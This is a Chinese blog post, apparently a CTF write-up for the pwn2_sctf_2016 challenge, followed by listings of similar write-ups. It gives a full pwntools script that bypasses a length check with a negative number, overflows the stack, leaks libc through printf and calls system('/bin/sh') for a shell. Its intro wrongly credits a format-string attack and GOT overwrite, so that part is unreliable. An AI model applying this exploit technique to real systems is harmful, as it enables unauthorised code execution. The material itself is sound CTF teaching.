sctf2016 pwn2

最新推荐文章于 2025-02-24 14:08:59 发布
原创 最新推荐文章于 2025-02-24 14:08:59 发布 · 213 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入剖析了PWN2_SCTF_2016挑战中的漏洞利用技巧,通过格式字符串攻击获取目标程序的控制权,进一步利用LibcSearcher定位系统调用地址,最终实现远程代码执行。文章详细展示了如何构造payload,利用got表覆盖技术,以及如何通过交互式shell完成攻击。 
from pwn import *
from LibcSearcher import *
main = 0x080485B8
gotatoi = 0x0804A020
formatstr = 0x080486F8
pltprintf = 0x08048370
p = process('./pwn2_sctf_2016')
p.recvuntil("How many bytes do you want me to read? ")
p.sendline('-1')
p.recvuntil("data!\n")
payload = 48*'a' + p32(pltprintf)  + p32(main)  + p32(formatstr) + p32(gotatoi)
p.sendline(payload)
p.recvuntil("You said: ")
p.recvuntil("You said: ")
realatoi = u32(p.recv(4).ljust(4,'\x00'))
libc = LibcSearcher('atoi', realatoi)
libcbase = realatoi - libc.dump('atoi')
system = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')
p.recvuntil("How many bytes do you want me to read? ")
p.sendline('-1')
p.recvuntil("data!\n")
payload = 48*'a' + p32(system)  + p32(main)  + p32(binsh)
p.sendline(payload)
p.interactive()
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2692
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
pwn2_sctf_2016
小白垃圾笔记2
05-23 218
思路是泄露libc,通过printf,将printf的libc打印出来然后搜索。不幸的是,我没有搜到,在搜了一晚上加一上午后。我去交流群内讨论,结果师傅说,buu有libc。溢出点是vuln函数。因为get_n函数一次只能从缓冲区获取一个字符,它的作用好像就是把字符·放到vuln的buf中。这道题说是ubuntu16,所以下16,32位(刚刚看过)然后把libc复制到题目路径下,不是也可以,自己决定,仅仅是一个路径而已。然后利用溢出点溢出。小白垃圾做题笔记,不建议阅读。这道题,依旧做了半天。
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 435
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
【CTF】pwn2_sctf_2016
凉水的博客
07-16 1121
pwn2_sctf_2016
BUUCTF pwn2_sctf_2016
最新发布
2401_88087539的博客
02-24 462
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
【BUUCTF-PWN】5-pwn1_sctf_2016
燕麦葡萄干的博客
07-04 351
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 494
BUUCTF 做题练习
BUUCTF-PWN题详解(pwn1_sctf_2016 1&jarvisoj_level0 1)
2302_80325559的博客
11-27 2672
今天给大家介绍了几个危险函数strcpy、read,以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题,思路大差不差,都是先找从哪儿溢出,然后后门的地址。如果大家可以自己独立做出来的话,就可以说只要以后见到这种题,分分钟拿下。后面的题就不会留这么明显的后门给我们了,会让我们自己创建后门,难度会大一点点。我尽量以简洁的语言给大家说清楚,大家一起加油!
BUUCTF pwn2_sctf2016
红叶的博客
11-01 644
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 797
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 691
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
buuctf pwn2_sctf_2016
carol2358的博客
04-22 319
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
[BUUCFT]PWN——pwn2_sctf_2016
BangSen1的博客
04-03 616
pwn2_sctf_2016 例行检查,32位,开启了NX保护。 运行一下 用IDA打开。main函数调用了vuln函数 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,这边可以输入负数来达到溢出的效果(整数溢出) 我们可以通过,输入负数,绕过长度限制,造成溢出,再利用printf函数泄露程序的libc版本,去算出system和‘/bin/sh‘的地址,最后溢出覆盖返回地址去执行system(‘/bin/sh’) f
BUUCTF-pwn2_sctf_2016
Rt1Text的博客
11-07 205
无符号Int,输入-1进行溢出 ,绕过长度限制利用printf函数泄露libc,利用system('bin/sh')
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值